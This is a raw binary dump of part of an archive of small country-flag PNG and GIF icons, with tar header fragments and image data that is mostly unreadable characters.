�����ϯ���7y61�g���������p�{�3�d��P�?XY33�O����ß��^r�^�:pf�/0:J�Y����篊��ŋ����+N�C\�B���� �����0������$`J-N:��cIEND�B`�images/flags/ch.gif000060400000000627152434416630010177 0ustar00GIF89a�3����������������������� �!!�0/�12�?A�?B�@?�@A�AA�A?�AA�A@�pr�����~���������������������������������������������������������������������������!�Created with GIMP on a Mac,���A�(Hc�aH$$I�P	�ɱh�I�����\�BIH;"��ЁEYH0 ".3!z{)+3,32�3$`m(31-301.2&iI
 ��n
|13n�FIEI33
�a�P#%�
��a{�IA;images/flags/mt.png000060400000000644152434416630010243 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<6IDATx�b���#ÿLLH�ߛ7<���@,@���r��Mmm-F����XX�1���?���/�6˿?�ܿ��ٳ?���)g��������������QVh@�0��hhh~�����)�����7P@��{������o���q�Ug��j��?�J���|�$�N ���W7P�$
������/�߿@5Ă�q���22��@�A��_�
@ ޼y��ւ�W���lA�c0M�[�y��vIEND�B`�images/flags/sc.png000060400000001140152434416630010220 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd`������<Yob�����?)�?�1 @�00|��v�`60�cjZ�_�?��0�������?�C�/�6P���;�s��b`�R����������_��"���@�d�?�������ʂU����{�JA�C40��
�@@wU�g`���u�������6�~�::���Ο �
��a2���?P������!�:�a������[Z1����� � N���s�?�/�Y�o�
u+�{����������@���u�G���_6��￳�o��r����~��郯|W�1��?B�������HH�KN�	�������������������1��%�8��A�x2�0(�����������������������՗�ןvRWn3\b`�`@�c�	��I�R�=��^��IEND�B`�images/flags/ms.png000060400000001146152434416630010240 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b<�]{�I�vէz�M|,��9�+���_�����/�`�1�/%���@������������������������1����Ȼ����9���6�&88��������������i��oy5Y�?����e��5?s_�T����_����z� ��7P��@'��&���drJ?cZ�iƢ��S������73��
��@~ ���mT�;��ß?�oܼ*ǭ���׏_@��������@�1���5+<-��������������Q,�4������(�ٺ�	v@c~��������a|���w���w�9?u,�����h��?��5@�����:��=���?��(!!�
$�@:���&��D~����/��/��#C$,F��H�2��wF-5�
�IEND�B`�images/flags/to.png000060400000000652152434416630010244 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<<IDATx�b���#��D�	
i� �X��|||w�_��!$�AU����\�?���a�����?�a�M��b���Z�ϛ����}�" �$����f���@L �@3��XX�@�P� u?A�/���������\��  �!$10??CQ���d����4\�x�?�6Ȇ�������7����fC�v@�1#Xh�"T� �?@70H38��0��j�
F�i`���ARl�_�? ��`# $��A@��5"pD�?XR0�N��e�IEND�B`�images/flags/cl.png000060400000000702152434416630010214 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<TIDATx�bdH?����&�����.�b``��00×?�Q��f�N����/'3#�FFFfff&&��H�˗/���!�B��?C��У�?�~�	T
��� �;�]x�����7?����_���P@�0p|��ڸ���9����K5ý;L�8�?����?ӿ��8������X�&�o��_����������߿����~����F"���ޟ:@,@�0����AQ��$��0�����`�"Lm��2�� �@�~�a����H'#�H	D�BP1@1~�.b@�I@���h9?9�IEND�B`�images/flags/pf.png000060400000000762152434416630010231 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�����"��$6@���a=�����)B�l9���֬J�
�)�r�E|������@�@�@��A� ��������f����@��_�����3\�tc5#;�����!��?FFƏ�>�?����W�?.�:��ϝ�?}��s���b�������}󟷟�2J^�f�����W���7��j �����/��?��z13�A����Ă�������P�+����4�Y9�e���@,�%$�����w�������/W0Ƚa��_v��/(X����$)��7㟿@9�߿���a�d�"�/�q�_����������Cb�1/IEND�B`�images/flags/tt.png000060400000001151152434416630010244 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx��A�0���ڧ�r�����%tF���~Q�Wk�f1�xy��8����\y�����)))�DF2���N�?�������i@17�{�hoo��q�ҥ[�n�]�s�.,������ׯ��zD�<<?��1�����:YY������������Abb��������������

���������ʊ��I���mcc�޾�.ݼ钞�s�\�χ������w��\�OL*}���Ç�]��s�H?��Ǐ������/����z�SS�_���\��ST����'N0��� ��k�����}
�������=3����̕�~��P�u�����\��dh���`���4��{w��9u�RPu5�ݻ���AO����?71޹��蛟����o߾}�������99_��="��5�K��OYY<Ȁn��
`�c5P��z�IEND�B`�images/flags/mk.gif000060400000000633152434416630010211 0ustar00GIF89a���������(ހ��%�+���T��a��]߄���i��O��������������� �W��������-�R���j�����9�����f��������?���1�Z��@�!�,��������t4e�SѰl>��(R�N!t�b�y"d@>�����htGG< * 7 %6,J1"%0-#;=0/#-.4*.�Y+
((!]�e5lo1d+)
Y\^$!&23�I�Y2A;images/flags/ge.png000060400000001122152434416630010206 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b|��5���B��H2�e����?0���\
 �X�������^8Ϥo�((�?ï���~�KJ�������hj� )u���b������wg���x�����gO�>�������<~�h@�l*b�u��a�7�p�����?��;	����Y�@����tր�?101����߿���s�(P���6v�3ӿo?��^��ˏ�3��D��������������?6o���;P��o���rr_� ��P&3UF�?�m����I�~&;G6����032���IP�m�.�1������������������YT�RM���������瓋����������	�?6�}�k۷�+ ������&�ٷ�Sw�����,v#3�7o�ͬ ��(.���'###�����;��$���ЈC�M_h'�\�:�ҶNs�KIEND�B`�images/flags/zh.gif000060400000000252152434416630010220 0ustar00GIF89a���r�u�v�4�
�����������+�q�N��7��b��!�,' %�dY> ���DSѰ�r(	E�$�@C�g�Ȥr�l:�!;images/flags/tw.gif000060400000002012152434416630010225 0ustar00GIF89a���		���$$���**���&&����,,��UU��##�""�JJ�����  �����������

������!!���$${{��MM�OO�))����
��SS�QQ��++����������%$�NN��ZZ���_\77��%!==��))���""``���# 
�� ��##��,,�	YY������ �		WW����KK���$$�

���!!�((�((�''�!#���[[Y]���UU����HH��dd��XX� �� �"���bb���DD�&%yy�����%%���..QQ������������JJ�WW55�
	�55��
�RR��HH�	���!�,�#����S�3f��* �De5f�Q,���a�@�v���&�.1�DIC#T�R�ωNw�xPRd�
,H#@ȋ-N��I��P�O�h؀"�t*�#�&G_������$
<n$���*`�`�a�2d]� ��
�!,�L`��Ā�ְcd��GY�aD@� @�AS�.f�As�A�m( P�ĜC>z�i4(��xr��5D( (E����ȉ#�;images/flags/mh.png000060400000001164152434416630010225 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�bd�f��~�c�����~!���61���M2'
	����������������������&�T�v�AB���F��+w�\�������з�̜?���8�*"�)� �����1�122��1CLZ��7#�`3�+��;�y?�Wq�o��/t@1�������
�����������[�H�'9�6^�(�����1�������������������C�^�+*�:��)������줆t�$���������L���
��5�oV�]��w�9p�ы�_����@`
@K~3����{!��/�Q�=&�]'_�:���7?�������������j����5�G	&o��O��޴���S{޿���?P�&�ߠ ����?��i�Q|�f�|��C_�?���/1Na~�������@���s��g��``x�Q4���l������KIEND�B`�images/flags/mo.png000060400000001114152434416630010227 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd���
�10����`B�0��j�j�������ed)���ϟ��������������������O�J�����,���/�8���/~����_@ղ<�@;�	��&�����?��$)���q���j�����?d~��D@=@W����:��?����i���_����5������~�i &�o�fu�1�Z��)Z�����kV���P.����/P)@1�>6"6�����k,j;;��/0
�ռ��������	�
�_%�J8Y8�����wF�w?޽��h9P��?�
���$ ����P�P)n)]A�m���}a�5����b�b�0�%�%��A�~o|��߿@#��$��@�
t��_��P��	��`��)�!E?@��A>�w�A�IEND�B`�images/flags/pa.png000060400000001007152434416630010215 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b���#��L)aa ���@@,@y>>> ����2^�������

�}��������כ6��g���9����qfLR|�����{���ϟ�������~U3��� ���$/��×���@Q&C4�"�b���^���?�8��	��X)X�o�߿�6�VK��W������Ͽ��2I�?����~�b:$��oF11������>���o� 	BY�*��&&�?������ߟ0u ��'����׌�&L�x��S���/0���?P��_��w���^�
�� �X�N'��t=0��d3�TfMMΞPt��C� �\�]���ï? ���_@�P�p�?y]
z�-�IEND�B`�images/flags/gb.png000060400000001127152434416630010210 0ustar00�PNG


IHDR���ntEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�4s�����C�^�a``����ߊ�+mS����[�_�w�o���~Ȫr:]�v�'�E����>��л��?���FUE!5Cn�_?�+
y�����F[���L�5]��^g�w�^	��+T���Wy��'##�Ż����Og��wxci�7;�N0���7z��*�mn����0|���;��?����f`��׊+7>������ݷ���G������Ā��\{�r�e��7��;�3��%��?�qp���׿߿�E��eѐ�y�lm��Y@�������?'��`Jk<�7�Bt�Ϋ�>0�{�+%��_�my��3g�Csv��͋L�ln�����qa��3�����;/Y0���ϟ@�0��o�\d�>S�\��3�������}l�7s!����30jJ3jJ#�.�氦��9���mY��~;�-m������������0�m�?��������2���z�!9���[��
�A
�K~�IEND�B`�images/flags/pl.gif000060400000000074152434416630010214 0ustar00GIF89a�����!�,������<�ڋ�޼��V;images/flags/is.png000060400000001024152434416630010227 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bdП�ϥ�cfV���Yaï? �L����D`P�m�� ���l#1�Q�BaKw�i^�����f�z��,�Ct��Ԯ�	 �������? �ϣG@��_��T����_ ��:��9���4��_�������@��H�`���@=��@�@�% [��g���&<DhŪ��P٧O���6�HE��Ǐ�����o�߿��_����~�����/Vy�K{���� �6�zm܌�&&�����̄�f�ǯ�������/�|���`��@Oˋs��@,����D�����h��/D��S��/��?1A�?`)) )%�6t���!���p�@���|��抠���ע�E`���#ZAf�cʬIEND�B`�images/flags/ma.png000060400000000660152434416630010216 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<BIDATx�b�π�P�X@�����_����upɒ�2�ҒKF6h�U
�wg���@� տCH(�$����f���@,`��������<��_ =`
�53UU����H�����Y����6>����/�=P
@��	�?Hn����ԯ���p��!S
A�M ������Ȇ߿�n����?�4����d#�IvX�*���_�g@V�������00H3ċ�`��	����P��@ 
L��0HJ�����l$�"pP1@1~E�H<q�qW��&�mIEND�B`�images/flags/gl.png000060400000000726152434416630010226 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<hIDATx�b���#��L�)@,@	>>> ��������� $�"��={@,�A��|aX����߿�j���oa������ϟ?�U
D�?x����߾���K�W�l:	 ���n��C�������� ���˖aj ƿ���!!�?|���Л��џ����??VV������z���1�G�������ͨ���{�b�H��=�#GQT-��f��h��bj`r~�d�8d���f�/^��4�cP
��2���,@�40��� )	2f�t1Q66�G�>|`��B�BP1@1~�(b@�I@��[J�ă�IEND�B`�images/flags/sr.gif000060400000000451152434416630010224 0ustar00GIF89a�������ziꧪ�b0̙3�ED����IF�-0�Z0�~t�{t볽�i6�33�����̙�����x�xhߐ����e?�ff�[#��ⰺ�胇�`0����43!�,F��pH,��L�xT.��Y<>��`+@T&
wLD0L��FH�b6��q4r`� |��|������A;images/flags/jm.png000060400000001175152434416630010231 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b������'_1��?0���~10�``c��� ��1�U;��{�����������������	�M�A���%1�1���=��D2�6'�������������.
�k�
������1�03<���4 �=��������[�p�
����������
�������߿?~�Y���٫b�*��d����o
�_W���[���_@ۄ~�* & ����o0�z�w����R�����_�� ���0�	l�����_�b�*~�K����׭�?�~��T��j�
� �@N���}���z�b���i����;U�W����J�����| 1�FB1bK�MG�����������3�I:�.�������Q����$����^���K���0F���G��O��_w���_��w�@�_�2<��`t�����c��
�-���>sw!�IEND�B`�images/flags/ph.png000060400000001032152434416630010222 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b\�vzp�7�/ ����������a���P�ʊ�ʩ�!�\��c��3�dҀH/(�U#�@�߿����۶�ɚ5��}���/������������ee��o�@L|��cb����ZR�%+�����?�����4�$�b��H=f`����tm-�z���?��?!@� �X>30<������\���
��W���}n�?����t՟_��?�NP���2����gc���������V���?��[)�� �X�.k�a`��)���?��kd��P-@5|e`��_�a��f���Y����/0�����K/�?y�A@�����`# $��A@_�����`��mL7!U�_)��IEND�B`�images/flags/tz.png000060400000001202152434416630010247 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�bd���
�10���@􍁁�!ލ!���3T	@�0|a�v�)���������߿����ȟ��",,����ߛ6m ��O�>*�����������;V�)���~g��z��P�����\�b:h2P���A��D~�*��{��_������7ӯ���N��2��@������O��og��/�ά����/ �Q��Q��--z�Ir]"@�=t��������{�_[�����_I1��#E~2�6�*|�ӊ���bЋ^j<�~�����@s+��.aV���ض�d�/F%�����C��oY�_Ӧ�ٺ��_�b��E
��+Yp$�+�_�@����?���ߧ��z���¿�kI|f9�R��_"����B@��" �X�URS�ppHJJ����������Bι��\\������/����d:	 �a��������q�a����rc!��@q��`u�)���=IEND�B`�images/flags/cy.png000060400000000654152434416630010237 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<>IDATx�b���#��L�)@,@�������?D���N!�/^L�d��@1 ���� ��PU�c�v��O����w�?h���?P���� m_N���7����n��|��"��g�����b��b���_������?������p�1��@ 
0���3����ֻ�����o^a;	 �Xƃ��ۗ3����ݼ��0��x�W������{������e��9��5C��ݻ���[>>>dc��,H���w��Ab����0��]/uT�IEND�B`�images/flags/fam.png000060400000001024152434416630010357 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd8�������a`����ï?����X@B���Q���?�_L܌Ue���c����?�?���5e����� �{�K@��	����o
��&	�~����rK��0&%�7�i>O'��*�k������@�Q�T��������?��?�0ÿ�3y��:�������
�r�_�d����? ��������\�zd6P�� 6�:I�4�C�V�4�I@O�'�%����s�oH����H(x��c��?�/F���N��/�n����c �
��3I�C�7F)!~Fff���!D@��@������a�Wp�ci��6T�P	�]�;�T��@�a�e�/���IEND�B`�images/flags/cz.gif000060400000000271152434416630010214 0ustar00GIF89a�������ZZ�q[A���7��}O��H�
†F�����!�,6� Hdi�hKB��0��e]˳^�.�A��G!�lFt��Y+,���;m��;images/flags/sv.png000060400000000765152434416630010257 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�
��c�����?�������(���BP��Z�����������������?����˜Qw �X�J��cx���?���`� ��? u@�����OR�h/@1�?�UY��ׯ��3����u�r@4��٘�|@���edd:�?HX�w��c�R�����>}�@,�B� ��׿����
��_L����\5�|Cu�O�m���k�͉bةĸ��GU9��@����?�@���@���y��g��~��K�ы_�0���8�~C�/$�����I��3O�IQ���?�����7H0����5(��b ���2�e�G$��c�Cb�t�XlM��IEND�B`�images/flags/it.png000060400000000644152434416630010237 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<6IDATx�bd����10�ax���*�RU��� �ba��P�Z
R��IJJ����bb������ �e�&�ba`�?���￿@�P�o�����QVh@���T����FW
@�`
�5�����B�1��b�bzh�￿��%�(�@ 
�f�����F���	��߿��T������@W�a` ��@JCv
��>��@�c�?�ܒ o���BFFF8PR)#��������(�A��l�Y��8��@�
���8��.Vw�Q�r�IEND�B`�images/flags/fj.png000060400000001142152434416630010214 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b<�[��T��k���ؘʟˤK~
0�T� ����?�`��?�o@@1��o]�G\���+��}c����v��CC�_����� rҴ/�2��*ƫj��2���w6A��,��?bl����/X�� $�����@�l�2HT��z����B��
��?������xK!��"^�� �0�W1@1=3rc��Xy���o��X�}�f�W|�����~�����/��?@6�1�*(��
�&������%*.5���������WQ��2U�����o�3ó��1@\����������J��տ���ga~�g�r$ �X��������
����׷���)�nۏO�����?��F�4�B���{)�w��{��g_2� �X���I���/�I��ڀlF��@ܳ/N������ F�̯ �_`�W��@`8F����IEND�B`�images/flags/et.png000060400000001120152434416630010221 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�Td����a�����/�_��0���_`ap0çwթm �����������������y���d�ޔ; �X~�1�f|�� տ������E��_����/����@VDh.@�0(������H��?3�13�9_~�x���@���H�s3�21���v�����̄�>��� ��2�x:`���������	�ٿ@>1����
�Z�ϿN�K�|�#�@�4�!�(#ӏ�B���%�sc��HN�p
�51���j�����������Q������T����"�����?��f��(���W]s�u	m`Xj�9���_���j���/�9����$ؘ�~3����������4�2`T@�_�Q��P�hR@`!
=�ڮ��IEND�B`�images/flags/af.png000060400000001134152434416630010204 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b������������XY���
�V�2LL``��q��ݻwMMM@�� ��7㟿̿�������~(�������_?��\<{1@�P��W�����������~�����������{���%>���C�Kh	@������߿@�@�����/1��?����P���~����'�a(�w#@���шU�;�����M�l��A��ƭ����G�\�M�ˏo���4���{�qr�13c������~�����$��b����9@�?��˿��2�K���s��o�j���H�/�ba�t��?~@���]?�D����v�:�\�3���7P@�@��z��n��:�����������_�p��@ 
@uB��O3�����'�_�?2��
>qE^��~����i�bd@�a
�c8�ƒ:8��.��EiS�^w�IEND�B`�images/flags/hu.png000060400000000660152434416630010235 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<BIDATx�b<ˀ���0�B@��b�p
'�V�B���B�����ء��,ir��N��<�6��'O�����2�$P)��d������*+� �X�f�GV
��
V
V
���@1��������0���>}�@'AU�X#������@��@12�3d�d�w���?��������~��
D ��UR:[p �X~�H���_~AU�H��? 
���t@�0�b�$�$0P���f��P���/H@12X3����g@"�m~�gIEND�B`�images/flags/rw.png000060400000001025152434416630010245 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�$��
 �p�viS�S� ��>����
T�J}y�"G�}� ������������@���c���O��$���=�i�� �X f��
TR���/�����d���?U����M��BE~�1���@E SA���e����� 
��z�������/��o� �߿�����/�@������h��@qf�O����OV����9h:��d0�ؿ��ؿ �L�/^� .�/��g������_XI&&!>6�bz��$��U�j��?�������σO�����/�����$��1����*�=���!9H���X���ω�U
�+:�I�6���F-����j�K�� F�d�@�#�$�8�!\ �� ���h����GIEND�B`�images/flags/ve.png000060400000001020152434416630010222 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b���a�&!��@���# ������e
�E�^�
�y�����af�������/�6�?�	���
*���(
��	��ߌ��@�e�����!��/��P����7P@1��vv#�����������		������JJ�������������	�? >PHU��������m�>mެT
A@e@�������_��/�R=mګ_��U������V�7!&�3�uvV��o�5����?�@SA$����+�$Rz�
 �X�1e����=�!���Cp�?���`���@,@k�~�a���E��d��0@H :�����+4f����&�Zt��8�IEND�B`�images/flags/fi.gif000060400000000105152434416630010172 0ustar00GIF89a�����!�,�
p˛
ϋpRfcڼ�*�x�%F�Av�M;images/flags/es.png000060400000000725152434416630010232 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<gIDATx�b�π�P�X@�����_����upɒ�2�ҒKF6h�U
�wg���@� տCH(�$����f���@,�3���}����^�_��������/03��f`���@1��
T����?'00t�|}����/�jb��@��v�_�1�b���ØU�zW��[F�z��@L`�EO���?��Zf]#��l�����	��7P@11Ę�w/q�������?���̆�@7
�� �200����w�,�0��Ɵ��2����x �X��f���AR���C��!��@T@�_Q#OC@�	ZG�����IEND�B`�images/flags/hr.png000060400000001014152434416630010224 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�π�P�X@��$�������������?�߿�~������e�J�k`����S���(Z��G���;��(��\�������~�ee�6��pտ���Z����q�ܔ�~��	R��� ���� �߿�}��/Gǟg�03���ӷo߾~���� ���s��j)��/���'N|�������@O�> ������
��65�������{�j�U@��Ǐ��!�p{���?�������}~|c�:��}���$5�"���� ������������YL5*e��
�����0��q� �����a�z@$
b�ȿ`��$X@12��d�����U@� ��D���f08�v%3%&IEND�B`�images/flags/ko.gif000060400000001023152434416630010205 0ustar00GIF89a�SSS���ttt~~~CCC����-uuu�������
 `*Z���������5�;�����Vd��ҽ������撜^^^4�?1j�Ra������0O����Qw��������v�������lll���B��#QQQaaa�����E!Z���rrr'4u���[�MLM����
"ddd����YYYA�```�[z�����Q{����XXX�*�����3�/Q����������!�,p�K�����K!�D�4/K?�+*
�H2E#CA'7"�KJ6
9K%��=)1G8��@.(�I&>;F,K0��:-3 K5$�	B<����탁;images/flags/fm.png000060400000001050152434416630010215 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�4��
��g4���Z��
>�㤭�Y��L0"��5�b��T���������_����?��������s' ���*������!�@ͽ�n202��T��M������ba�r	H��1���cd`Xy�1Ph��� �HHP@��������_C���W~x�PP��?ДS�ނ��g�� �����m�!tɏ�/<x4�VS�\E(r��+�=�6� O�|�ߕW@��@������w_~��2�?��@�@ 
�C}v���_@޿���@E�^9|�5�+��Au�b����?o��43�N.�^��p�����?�b�r�>nV�7�����/��π��2$�����b�L^����@�P6в@�`IE�t�|�rIEND�B`�images/flags/ao.png000060400000000654152434416630010223 0ustar00�PNG


IHDR���ntEXtSoftwareAdobe ImageReadyq�e<NIDATx�\Q�JA�=/w��p\q���H���!�	��|�~�e�`���.�.�;���n8��2��y3��N~�N�H�)D�B�!HI	�K!EL��p((p�0��&/`o��l�(D�\"�M5�d��|��о'��ӱ[-4�a-bݺ�ğ�u�`�f#�bo5Će���3��X��#�:y\�YU�������AkWe�[�+����|u�({�^Q�&a��Q=�G�g��č���S�P��e�j���7���``��y"o��)�7c��v�����fR�\^��+��)m�<�wy���P7�e���]@���	0*�R��!�IEND�B`�images/flags/br.gif000060400000000146152434416630010204 0ustar00GIF89a���ٿ����ӗ�����!�,+�\�0�1k�8_�z!`(
i:Rk��b,�i-��6���@���;images/flags/ka.gif000060400000000113152434416630010166 0ustar00GIF89a�����!�,"�oȉzS2@{߫�žQ�H�&�yZ�L�E5ݫnj;images/flags/bv.png000060400000001000152434416630010215 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b|�r��sE]��D�3�?�`A�	@,@Q��j �����)FFF���0����~��
"��߿�n�@,`���{�H�|���σ@�������׿_�����,+� ���U��@�����_ � �@=�@$���@W��߿@g@�������c@e�>#s�d����v�@m@��$����H	���9
@�������ɂg�q��q&&�����=ff�ܬ?��l��줷v�~�|���o�7~�aQV�z�@���d@� g����'D�/� H'���?��f ��?�$A.���,�_P�3���������@�WaQ��މ�̮	���1$�`$�Z��l��IEND�B`�images/flags/ke.png000060400000001071152434416630010215 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b` �9La�w��]��2-����$w>@U��;��;qX�'O�<~��<-����IIw?�}���[�n޼	�T
@�WO�T��������տ%K����%&�������Ȧ���������g������7P]�����,���}|��߿?���t��ܭ�;P,9@07B�ϔ8�b۪��d�l�j��uy���d9#/5�؇���9F�xA����Z�K���$3�
(N;5,bG�/�ʟ�#�� ƫ�+)�C���>�x�0yӟ�?��$�@b /�gaf9pd%@1�ylJm������������	3����"����������+)ʈ����П�8�~�D������6�!��?���~���?P�?�b�bd�gR~��$����a0[b=+	�`iIEND�B`�images/flags/li.png000060400000001031152434416630010216 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�]�����00������1�J��_0��b����rB������9�P��s�o�������?����H�3V�l ����6���`���Z��o���߿���T��7X�����8�6H���;��r�}cg�����A�AJ������� �d�m����?�=7uw_SZ��/�o���������o�_~�e�~�� �X4?�P��'�#��������?@N���7�	�
�b\��fˁ��y��1�|����������_�$�f&�(���򍁁�Z��?����������$�����7�
�? �AJ!��M�5l	P�߿LA�@,���$��~���oƿ �L`0���Ͽ �`
�x��`$*
@�}�a�0�IEND�B`�images/flags/wales.png000060400000001214152434416630010730 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b|��9��������`�����ɟ�00��bJ�K������v~���?"D����٤.UMVA!i.Ii��{��H#�˽;��~���Y�wߘ߼������_����u��D��?�����?���)Y_���up~�}��7?�y�~�TX����#�/_b:	 �@����.Zr�]�~��r�ʷ���b}�⟓
���ӂ,C�|6Qq��1�����������
�wu�		�����wo$*�������1�	��Fz��P����������
�'����bo��)	"���1����������E����%��P�$�>�Z���Rw������1����������.��
��[�H�����S�����1�����������$�%�x��-ٟ���������=�
K^�xP����_��!�������L20��hz�IEND�B`�images/flags/lr.png000060400000000722152434416630010235 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<dIDATx�bd`�f@����(�?`�BP6z���߿�ڼ�rk������D����߿������?~|�������������bc��c��������@�������߿Y$$/L�@ 
{�ܴ�Qڸ���?%Zz�����f)�����'�w^����g�� �A���4�Ͽ߿X%eN�Z@��߾f����?n�����
�b�$,*����3�y w]r1�l0h/������Ʌ���뗬`����ōk�rIT\�����'`c ���r4��@�_v9�c�7���O�D���aH��_�@,�$���F�ԨEf@�n�g
��’IEND�B`�images/flags/as.png000060400000001207152434416630010222 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�bTT������������`@Ʋr�4��l1����������������������+�!��
�%���1��������������2�:��
=7�����������l6P�����.Z������e�����m���K�ݽ�H?8D�� �X�����7�.E�k���9�ٝs�����˞_>�"$��|����l��u��{�؟���r�2rq����Oڕ��L�|~}�"#��� @1���!;&����������
;�����!6[���1�����������D�#	���0/JN&��r���H���鿿~���	�z��:�|5�s���6��y,�l\����1�Y��Y�21= �
?��X~�����`��'0A��?�z11`?��|�MZ��yˋ����`d.$�13��10H10����!IEND�B`�images/flags/bn.gif000060400000000141152434416630010173 0ustar00GIF89a��
��)@L&�f3!�,&X���
�Q
@:X$x��d�)���m$�Su�|�$;images/flags/bm.png000060400000001143152434416630010214 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b<�^��I�z��z�K,L�/e�e�D�I}X:�����?0�F@1�3k��X���������:ɧ�����������������Ʋ��eοu׵8��c����,��0Z����]��_�������/�߿�de�V��4U-�7���}�(�Ω(���[��~]�����ʕ�����χ))@W�3��_<�3�1��������ۓ������_?k������M�'�I@
1�t�r�y����������!H���������kJe[\�MM���������J�y�ů���}y���_���9�t��/�?�� ���a�T���/ ��O�/���cֲ�s�qp���� �X@!
8P��Q
%��Y	rꟿ����@�4����UR������<��߿��_ĸ���,"����X-��$@�5�K�]�IEND�B`�images/flags/ky.png000060400000001203152434416630010236 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b�ZX�O�xޕr�[L��D
M��>� ����?0��1�'3s��W����
���������jE�}������p1����1�����������6(Ŝ���5
�1��
(�"$!!�	,*������������WY"�����1��2:	����������������r����z����1�$�
������������������"V�'�ԙ���ں�e��'n���u�
ßߌ����~�ɯ_<���c����@`�UѲ	h@�00]��ן���ʯ��g���m�X�N�y�6P.�@��_�o@5�+��(�[ 
@P矿
�ح��+~��0���@��P��������? ����~��8����	�~~b��%�bd`Ѕ�(2	��
�%�W��IEND�B`�images/flags/bj.png000060400000000746152434416630010221 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<xIDATx�bd���
�10�����Æ���C�k5H�@�������3�&������J~��	 �XX���|}���߿���2��c����G�"�F�e��Ȯ�@������7#��єBH��@
2�/P��?���������H�P4 y�m�a����^�Ӏ�"y����f3up&���	�����z��/X�����c���/����$��o`(HȨ���z~����@�@��9@�����������A4@TC4�j��/������HrK��񗅉�ߟ���<@#���߿t@12�20|G�/02�1���T4$k<@�+�IEND�B`�images/flags/lv.gif000060400000000072152434416630010220 0ustar00GIF89a�����!�,�����!��ڋsܼ{^;images/flags/lu.png000060400000000741152434416630010241 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<sIDATx�b�o�����������??��_������ÿ�� �X>�a�l���������2����/ӟ���!0�KS'@�0�����ׯ��e���?��U���"A�ߌ�@���/俒*��H������P'����O^ �߾}+((r��`�022�~� �X ޅ�X##0T����@����@�������;���9�s 	cC�pA�;��e����O>������_����p�0@�A����.�:��47ß�@i�=�~�c�0����0�b�������/`�_`�L���A� $@���yk�
߿IEND�B`�images/flags/at.png000060400000000623152434416630010224 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<%IDATx�b�π�P�X@�����_����upɒ�2�ҒKF6h�U
�wg���@� տCH(�$����f���@,���5�DŁV��Y���?~���&.�o�v�b|�򥨨(ؖ�`��J!$77�۷o�$�*8;�BV����?�b����XX���k$�_oe��ߴ�˿�����4X�a%!�?��a��t@�C��IIP�E�r���0@H��T@�_Q#OC@�|WZ�^�IEND�B`�images/flags/re.png000060400000001041152434416630010221 0ustar00�PNG


